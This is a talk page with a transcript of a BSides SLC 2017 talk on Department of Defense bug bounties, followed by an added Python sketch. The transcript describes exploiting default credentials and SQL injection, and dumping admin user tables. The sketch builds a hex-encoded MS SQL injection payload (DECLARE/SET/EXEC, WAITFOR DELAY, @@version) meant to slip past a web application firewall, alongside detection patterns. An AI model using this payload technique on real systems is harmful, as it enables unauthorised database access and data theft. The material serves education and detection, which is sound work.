
Federal Bug Bounty Programs

BSides SLC · 2017 · 25:32 · Published 2017-06
About this talk
Shane Lawrence shares his hands-on experience participating in U.S. Department of Defense bug bounty programs, including Hack the Pentagon and Hack the Army. He walks through vulnerability discoveries (lightly altered, as he notes, to honor his NDAs), from low-hanging fruit in a misconfigured analytics platform (plaintext login, vendor default credentials, blind SQL injection) to a manually crafted SQL injection that got past a web application firewall and IDS/IPS, and discusses responsible disclosure, writing defects that reviewers can reproduce, and getting paid for ethical hacking of federal systems.
Original YouTube description
A presentation detailing my experiences with the US Department of Defense bug bounty programs: details of the types of vulnerabilities one might find through these programs, both simple and advanced. I will also provide some guidance for finding and documenting your own vulnerabilities and, most importantly, getting paid to hack.
Transcript (English)

So, last-minute addition: we're going to talk a little bit about bug bounty programs, specifically the federal bug bounty programs, and how to get paid out. A disclaimer, always, right? Not the opinions of my current employer; I'm not here with their support. Even these defects are only representative samples that may or may not exist; they may look like real defects, but they have been modified slightly so they're not the actual defects. Some of this content is from memory, some from my notes, neither of which are very good anymore, so please fact-check me. I don't think I'm the smartest guy in the room; call me on it. Okay, we are talking about the federal government, so please leave your political opinions outside. Again, aluminum-foil deflector beanies not required, and Kool-Aid not provided. I did sign NDAs and all kinds of agreements to do this, so a lot of this stuff, websites, URLs, defects, have been changed to protect the innocent, namely me. Please do not try this at home, and especially please do not try this at home without the express written consent of Major League Baseball, right? Make sure you have permission when you're doing this kind of stuff.

So what's the greatest thing about presenting? Besides, I get to talk about me, right. What the hell is a corpsman? In the Marine Corps, the hospital corps, that's a corpsman, okay, just so we get that straight. Retired military; I was in the military from 1999 to '98. I did combat trauma medicine and got my BSN, just in training with the Marines, ran with the Marines for quite a bit, plugged a few sucking chest wounds in Marines, and that's all, chest wounds don't suck. But I went to UVU when I got out, transferred my BSN to a BSCS. While I was there I met a Romanian immigrant named Dmitri; now that's not our local Dmitri, if you guys are new, I know Dmitri, it wasn't him. But we started hanging out, spent a lot of time together, started doing a lot of stuff on security just on the side while we were going through school, and he introduced me to this group of geeks that used to meet at the GCMs centers like once a month. So that's how long I've been doing this, just on the side. In 1999 I started doing computers full-time. I've been doing hardware and software development and testing for places like Unisys and Intel and Fidelity and EMC, now Dell, yeah. And I actually started doing full-time application security in 2014, where I switched from architecture to security, to AppSec. Some stuff on the side that I still do: I do a lot of CTFs, I'm still an active member, an active part of DC801, and a lot of bug bounty programs. So let's talk about the feds for a sec: the Defense Digital Service. August 11, 2014,

we established the United States Digital Service through a presidential executive order. Thanks, Obama, right? It was supposed to be a tech startup within the federal government, so, you know, it's under the executive branch: the U.S. Digital Service, and within that the Defense Digital Service. Their mission is to apply best practices in technology and design to improve the usability and reliability of our government's most important digital services. What that actually means is: let's try and pull some of the government's network out of the '70s and apply modern processes to it, one of those being bug bounties, right? So in March they said we're going to have this whole Hack the Pentagon program, you can come in and hack the Pentagon. They announced it; HackerOne's going to manage that for them. The scope was anything defense.gov plus the Defense Video Network, the Armed Forces Radio Network, Armed Forces Entertainment Network (AFN), and the Defense Imagery Network, which is kind of like DVIDS but for just images. Later that year they announced Hack the Army, which actually started in late November 2016 and finished in late December, just a couple of months ago. The scope was goarmy.com, everything mobile, army.com. There's this SGT STAR, which is like a virtual training sergeant that runs all across the Army's websites, just a little JavaScript thing, so, just the whole gamut there. Really interesting.

But the program participants like myself were vetted through resumes and job applications, as if you were applying to a job, background checks, and other methods by HackerOne, so whatever they had access to by working with the Department of Defense. And if nothing else, they learned, from these people that they were vetting, they got analytics on them: what are their tools, what are their signatures, what do they do, how are they attacking us. So that in itself could be useful, right? You know, as an organization, just let people hack us and figure out what exactly they're attacking and how they're attacking it.

Okay, we talked about low-hanging fruit in development, right? Time check for me. So the first defect we're going to talk about is called low-hanging fruit. Okay, this is one of those easy ones, right? So I used an intercepting proxy, Burp Pro in this case. I went in and I set the scope that was given to me for defense.gov, and turned on the scanner and the spider, and turned off interception so I could actually just start browsing the site. I browsed the site through what looked like normal user paths for about ten minutes, and then turned that browser off, went back into Burp Suite and said, all right, what are the tens of thousands of requests that just happened? Sort those by response type, response size, everything you think about the individual requests that go to a website and get answered. I see this one that's like, that's supposed to be a request for favicon.png. Now that's that little icon that shows up in your browser; it should be like a tiny little thing, right? There's a huge request for it. Well, what the crap is that? So I'm going to look at that in my browser again, manually. That does not look like favicon.png, right? Now when you see that on a defense.gov website, what's your first thought? What have I just stepped into, right? So in actuality it was not a honeypot, well...

But side note, what is a honeypot? Something that's set out there, something that's easy, it's low-hanging fruit, maybe it has some data that looks valid, to keep you from, you know, hitting the real stuff, right? So we'll leave that open for debate, whether it was actually a honeypot or not. So if we go back to that page, what actually happened there? So I'm an analytics developer, brand new guy, probably left the back door in there disguised as favicon.png. So part of that, we're going to watch what these hackers do, we're going to go in, we're going to track them, we're going to see what their tools and their signatures are. Let's set up another analytics program so we can see that even better, but let's not secure it. So what are the problems with that page? There's just this page sitting out there with a login on it that we don't know is there, we're not controlling it, we don't have any analytics that give us that. What about plaintext auth, right? It was an HTTP page asking you to log in. Stop there, wrote a bug: hey guys, that's bad. Okay, wrote another one that says, oh, by the way, there's a password recovery there that's in plaintext also. That's bad. So I start looking at that page a little bit more; there was a key on that page that said Piwik. Oh, all right. Next step: Google. What is Piwik? Now, disclaimer here, nothing against Piwik. It's an open-source analytics software framework. I'm not saying that they're bad or insecure; I'm just saying that this was an out-of-the-box deployment of it, and so: not bad software, bad DevOps. When I start Googling around Piwik, I find they're more than happy to give you the default users and passwords on their support site. When you set up Piwik, stand it up right out of the box, here's your admin user and password. Is that going to work? Oh. Stop here: hey guys, this is really, really bad. Okay, so there's, you know, a couple of defects that I wrote against it already. The documentation also said, oh, out of the box, here's your MySQL cred. All right, so let's throw a blind MySQL timing attack at it, you know, just out of curiosity. Yeah, positive for MySQL. Stopped here, wrote a defect: hey guys, you have MySQL injection here. So this is really, really, really bad now. So about this time I get a response from the bug scrub: it's just analytics, this isn't the defense website that you're hitting, this is an analytics site, come on, we can't pay out for attacking an analytics site, can we? So at this point I'm like, huh, come on, gloves come off. What kind of damage can you do with analytics data? It's not the actual site, it's just metadata about the actual site, right? We track with analytics who was there, where they came from, what they were doing, how long they sat on each page, who logged in. So I start, you know, like I said, I was kind of miffed at this point, it's like, no, it's just analytics, it's just nothing real, you know. So I start pulling tables, start pulling up sqlmap, pulling out the big guns there. Oh, what? Here's the public users table, and since we already had the usernames, default usernames and passwords, it wasn't hard to figure out that, oh yeah, these hashes, they're SHA-1 hashes, and the salt, yeah, it's just the usernames. But once again, you know, that wasn't real consistent; I started trying to guess new ones and it wasn't working out very well. So, you know, as with any crypto technology: more time, more samples, more success, right? The three users that I had were just the defaults there; that's what it looked like for real. And oh, by the way, so I thought, anyway, since that was unpredictable, you know, I couldn't really say this was actually the hashes. I start pulling a few more tables. Oh, this one is another users-type table; it has the emails, the usernames of the admins of the actual site. So what are we tracking with analytics? Who's logging in, how often, from where. Okay, that's something we can work with. That's the table that I ended up sending to them in an email. So stopped here, updated the previous defects, said, all right, if this isn't that big of an issue, who is sergeant so-and-so at army.mil? Looks like he logged in here. Oh, okay, we agree that's bad. And by the way, you guys are stupid because you're not doing any egress filtering, so there, take that. Anyway, that's the low-hanging fruit bug.

There's another one here. We talked about, who knows their Dante? Perversion, deception, treachery, the ninth circle of hell for Dante, right? This one, I think you'll figure out why I called it that.

Tools used: some simple online encoders and decoders, along with 17-plus years of trial and error and instincts in testing software, making software, making hardware. No automated tools or scanners or proxies would work, because of the web application firewall in place and the IDS/IPS that were in place. So, I mean, I did use Colasoft Packet Builder, if you guys ever use that, just to really verify the existence of the web application firewall and the IDS and IPS, doesn't really, you know, just getting the right things back, making sure I'm getting the right packets back. So, but in all actuality, this was a three-week engagement, about two to three hours every night, and maybe 500 to a thousand requests every night, manual requests in my browser, so just to give you an idea of just how long it took me to put this together.

Now let's step back a little bit. Software test methodology: run a test, you get an expected result, which is good; an unexpected result, which is bad; and then sometimes you get a really FUBAR'd, way off out there, right? This is the expected result if you throw crap against the Army's website: oh, we can't answer that, we don't know what that is. Okay. This is unexpected: you throw some crap against their website, you probably can't see that very well, that's the server error 500. Oh, we don't like what you did, kind of broke some stuff on the inside, we're not going to tell you any more. And then there's the really broken: you don't have permission to do what you just asked me to do, so go away. All right, so following that through manually with your requests, I write a defect. There's a SQL injection vulnerability in [fake URL]: by inserting a noflash tag at the base64-encoded href and then an MS SQL query logic error, declaring the variable with a hexadecimal-coded string, it gets down to the MS SQL execution layer. At this point it's a matter of ethics. I could use different encoded strings, statements, to find the scope of the users, show the tables, or up from there. So that was right out of the defect I wrote.

Their initial response: we can't reproduce that from here, but we're behind the firewall and the IDS, so yeah, we'll work with it. Then it comes back: well, it works on my machine. Okay. When we run these requests at your site, next we get a 404 on everything; we don't get the 500, we don't get the forbidden. And finally: fine, if you have a SQL injection, send us the SQL version, we'll believe it, we'll pay. Challenge accepted. So, reproduction steps, part of the defect that I wrote: on the fake URL there's an embedded Flash video, there's like a, you know, video.flv on there, right? They're discreetly providing a noflash solution, so make this request. Can we read that before I change your screen? No? Sorry, moving on. All right, here's the same request in plain English, for the sake of brevity and time. Let's walk through it. It's actually two different requests. So start with the base URL, the base href; right there it has the embedded Flash video in there. .noflash: hey website, I don't have Flash, can you display the following content without Flash? Let me figure out that, if you ask for that video manually, you say hey, give me this video, in your URL, in your browser, it can't find it. So it's not just out in some directory structure; it's in the database. So: hey, I don't have Flash, can you show me this video? noflash, dot, base64-encoded href that the Flash, that Flash video, is on. All right, so I don't have Flash, show me this without Flash, pull it out of the database, basically. Then throw a URL-encoded MS SQL logic error at it, you know, the standard MySQL, MS SQL breakout, right: close what you're doing and start a new one. Now that we have a new SQL line, I want to declare a bucket; that bucket should hold 200 of these things in it. He's okay with that. That had to be URL-encoded, by the way. So did the next one: my bucket is Q and should contain the following stuff, this hex-encoded ASCII: WAITFOR DELAY 0 hours 0 minutes 10 seconds, into my bucket. When I execute that one, I get an 11-plus second delay on the site. All right, we're on to something. But if I actually say, give me the version stuff, the hex-encoded ASCII of that, in my bucket, yeah, now I get just this plain white page. It says 12.2.5000. Anybody know their MS SQL, their MS SQL versions? That's the current version of MS SQL. And then after we send that in, once we populate what my bucket is, we say all right, execute my bucket. So that's the one that's like, I would do that? No, that's the one that took two to three hours every night of just mashing with these strings to figure out how to get past the IDS, how to get past the web application firewall, how to get access to that database where that Flash video was being stored. And so this is one that provided a big payout, because it was remote code injection: I can sit outside and have you execute code. So just returning that MS SQL version string was what their test was, right?

But what you really came for: how can you get payouts from bug bounty programs, right? Who's in QA already? Who sits and tests software all day, every day, anyway, right? Okay, a lot of the stuff is

going to seem familiar to you, you know, how the software gets deployed. So if you were working on this software, if you were building and deploying this, how would you do it? That's a key. Be good at writing defects and doing it quickly; let's talk about that. So make your defects clear and concise, you know, short, sweet, absolutely up front. Make them easy to read; code and screenshots come afterwards, as attachments, so they can just go read it right through. Make your defects easy to understand; don't assume they know what you're talking about, don't assume they know the technology that you're working with, don't assume they even speak English. And do it all quickly, because you don't get paid out for duplicates.

Now, tester's instincts, hacker's instincts, right? You've all seen those applications that just don't feel right. You follow that bad smell, right? That's how you get that last one. There's a bad smell in there: if you put a noscript in here, something kind of funky comes through the application. You follow that through and you start pushing it harder and harder and harder, and then you find something out the other end. So follow that bad smell; use your instincts and critical thinking. Know when to stop, either because you're toast, it's one o'clock in the morning, or because you're banging your head against a brick wall, this isn't really going anywhere, you got to a certain point and then actually they've secured it now, or because of ethics and scope: don't cross that line, you'll never be asked to come back, right? But also know when to push harder; that's how you get paid out. Know when to push harder against the application and against the reviewer. Now these reviewers, I may have painted them in the wrong light here. They don't do this just to be mean; they do this to test your conviction to your bug. How convinced are you that this is a problem? And they're going to test that, so be prepared to defend your defects. Know how to use those free and open-source tools: hashcat, Burp Suite, sqlmap, you know, all those tools in Kali, holy crap. But just know how to use the tools that you're going to, you know, at least one tool in your toolbox, right, one of each kind. Be non-destructive: that users table and email went a hell of a lot further than a crashed application, dropped database. And finally, stay within the boundaries of your ethics and the scope they give you; once again, you'll be asked to not come back. Thank you, Meta, for this; Danny, if you're in the room, thank you. I guess I'm supposed to be the guy with the purple Snuggie there, but whatever, I'm okay with it. Questions about federal bug bounty programs, these hacks in particular? I think we've got about three or four minutes before Leslie comes and kicks me off the stage.

I don't think they mean to be competitive. The question is, if you have a reviewer or a bug scrub board that tends to be combative, and, you know, I say you have to defend your defects, how do you prepare for that, or how do you even preempt that? And I guess the answer really is: be prepared to defend your bug in the first place. When you write your bugs, know what you're talking about and put it in a way that's very clear and concise, and give it good reproduction steps: this is how I did it, this is how you can do it. Now, there was one here where they just said we're behind the firewall, so that's not going to work for us, you just, you know, you just got to convince us. But try not to think of it, you know, like I said, they're really not trying to just be a dick about it; they're just trying to protect their client's interests, to make sure that this really is something that's as bad as you say it is, and that they're not going to end up paying out on a bunch of just crap bugs that really aren't there. So just be prepared to defend your bugs, really, and expect them to push back a little bit at least. Other questions? No? All right, go ahead. Oh, you know, I didn't bring pictures of them; they're on my Twitter. I did put my Twitter up there earlier. When you get a payout from these guys, you also get coins, challenge coins, a little, you can call it hacker street cred if you want, but they're pretty cool, they're pretty nice. Those who are close to me, you've seen them before, probably. You know, I come in, I pat myself on the back and brag about them almost daily, right? So more than anything I use them for my imposter syndrome; this reminds me that, yeah, I am that guy. Okay.

It's possible, you know, and, you know, like I said, in order for me to actually get down... and granted, I was probably emotionally beyond that line at one time, where they said, you know, it's just analytics, there's nothing wrong with that, really, right? When I start and I dive down, and I say, you know, sergeant so-and-so at army.mil, and give this list of ten actual people who log into there, admin people that work in the Pentagon every day, and they're logging into this application daily. Yeah, but that's why they go through HackerOne in the first place; that's why HackerOne managed it for them. If you do step across that line, if you do see something that you probably shouldn't have, that's part of the NDA: you know, you just don't go talking about it. But that's just part of the vetting process, too. So they want to make sure that if you do step over that line, if you do see something you shouldn't have seen, you're still at least a trustworthy, semi-trustworthy, reputable person. So they do have, like I said, pretty extensive NDAs and other agreements there. So, other questions? All right, thanks for your time today, guys, and thanks, Rob, for giving me your time. Rob, if you're here in the room, again, thank you.
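Added example, written for this page and not the speaker's code or payload: a Python sketch of the encoding chain described in the Hack the Army bug above (base64 href, a noflash marker, then a URL-encoded MS SQL breakout that declares a variable, fills it from a hex literal and EXECs it), paired with the decoding a WAF or IDS has to perform before it can see WAITFOR DELAY or @@version. The parameter layout, the `.noflash` marker, the variable name `@q`, the sample URL and the detection patterns are all assumptions; the speaker altered the real URLs and payload details, and the page does not give them.

```python
import base64
import re
import urllib.parse

# Everything below is illustrative: the ".noflash" marker, the variable name
# @q, the parameter layout and the sample URL are assumptions, not the
# speaker's real target or payload (he altered those for the talk).
NOFLASH_MARKER = ".noflash"
SAMPLE_HREF = "https://www.example.mil/media/training.flv"  # constructed


def hex_literal(text: str) -> str:
    """MS SQL hex literal (0x...) for an ASCII string, so that no SQL
    keyword or quote character from `text` is visible on the wire."""
    return "0x" + text.encode("ascii").hex().upper()


def build_exec_payload(statement: str, bucket: str = "@q", size: int = 200) -> str:
    """Close the current statement, declare a VARCHAR 'bucket', fill it from
    a hex literal and EXEC it. Only DECLARE/SET/EXEC and a hex blob are
    visible to an inspecting device; the real statement is inside the blob."""
    if len(statement) > size:
        raise ValueError("statement does not fit the declared bucket")
    return (f"'; DECLARE {bucket} VARCHAR({size}); "
            f"SET {bucket}={hex_literal(statement)}; EXEC({bucket}); --")


def build_benign_param(base_href: str) -> str:
    """What a legitimate noflash request for the video might look like
    (assumed layout): base64 of the href plus the marker, URL-encoded."""
    b64 = base64.b64encode(base_href.encode()).decode()
    return urllib.parse.quote(b64 + NOFLASH_MARKER, safe="")


def build_request_param(base_href: str, statement: str) -> str:
    """Same as the benign parameter with the SQL breakout appended.
    Where exactly the SQL sits relative to the marker is an assumption."""
    b64 = base64.b64encode(base_href.encode()).decode()
    raw = b64 + NOFLASH_MARKER + build_exec_payload(statement)
    return urllib.parse.quote(raw, safe="")


# --- defender side: what a WAF/IDS has to do before it can see the SQL ---

HEX_LITERAL = re.compile(r"0x((?:[0-9A-Fa-f]{2})+)")
# Patterns that the hex blob hides; assumed signature set, kept small on purpose.
SUSPICIOUS = re.compile(r"WAITFOR\s+DELAY|@@version", re.IGNORECASE)


def peel_layers(param_value: str) -> list:
    """Successive views of the parameter: as sent (0), URL-decoded (1), and
    with every hex literal expanded back to text (2)."""
    url_decoded = urllib.parse.unquote(param_value)
    expanded = HEX_LITERAL.sub(
        lambda m: bytes.fromhex(m.group(1)).decode("ascii", "replace"), url_decoded)
    return [param_value, url_decoded, expanded]


def first_flagged_layer(param_value: str) -> int:
    """Index of the first decoding layer that exposes a suspicious pattern,
    or -1 if none does. 2 means: only visible after hex expansion."""
    for i, view in enumerate(peel_layers(param_value)):
        if SUSPICIOUS.search(view):
            return i
    return -1


def looks_like_injection(param_value: str) -> bool:
    return first_flagged_layer(param_value) >= 0


if __name__ == "__main__":
    for name, stmt in (("timing", "WAITFOR DELAY '0:0:10'"), ("version", "SELECT @@version")):
        value = build_request_param(SAMPLE_HREF, stmt)
        print(name, "on the wire:", value[:70] + "...")
        print(name, "after hex expansion:", peel_layers(value)[-1])
        print(name, "first layer flagged:", first_flagged_layer(value))
    print("benign flagged:", looks_like_injection(build_benign_param(SAMPLE_HREF)))
```

An inspection device that stops at URL decoding (layer 1) sees only DECLARE, SET, EXEC and a hex blob, which is the situation the talk describes. Two practical consequences: a signature set needs to expand hex literals (and any other encodings the application itself decodes) before matching, and an EXEC of a variable that was filled from a hex literal is a strong signal on its own, regardless of what the blob decodes to.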